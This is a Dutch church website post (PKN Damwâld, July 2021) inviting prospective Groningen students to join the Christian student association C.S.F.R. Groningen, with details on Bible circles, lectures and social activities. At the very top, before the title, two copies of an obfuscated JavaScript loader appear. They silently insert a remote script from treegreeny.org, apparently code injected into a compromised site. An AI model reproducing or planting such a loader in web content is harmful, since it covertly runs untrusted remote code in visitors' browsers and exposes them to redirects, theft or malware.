;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ga je binnenkort studeren in Groningen ? - PKN Damwâld

Ga je binnenkort studeren in Groningen ?

Gepubliceerd op: dinsdag 13 juli 2021

Beste aankomend student(e),

Ga je in Groningen studeren en wonen? Overweeg dan om je aan te sluiten bij C.S.F.R. Groningen. Dit is een fantastische studentenvereniging waar jij een mooie tijd kunt beleven en op terug kunt vallen gedurende je hele studententijd. Wij zijn een hechte groep van zo’n 60 studenten die opgedeeld in groepen van ca. 7 leden elke twee weken een bijbelkring houden. Verder hebben we regelmatig diepgaande lezingen over allerhande theologische en maatschappelijke onderwerpen. Zo ontwikkel je jezelf evenals je persoonlijk geloof.

Daarnaast worden vriendschappen gevormd door tal van onderlinge ontmoetingen zoals zoals maaltijden, borrels en verenigingsweekenden in binnen- en buitenland.

De studententijd is vol vrije tijd en kansen. Laat daarom de mogelijkheid niet liggen om je aan te sluiten bij een christelijke studentenvereniging. Zorg voor een vertrouwde omgeving waarin je nieuwe mensen ontmoet, jezelf ontwikkelt en allerlei leuke dingen doet! Kijk voor een impressie op onze website of sociale media. Aanmelden kan tot eind augustus en schroom vooral niet om vragen te stellen per mail naar ejc@csfrgroningen.nl of via DM. We hopen je na de vakantie te verwelkomen!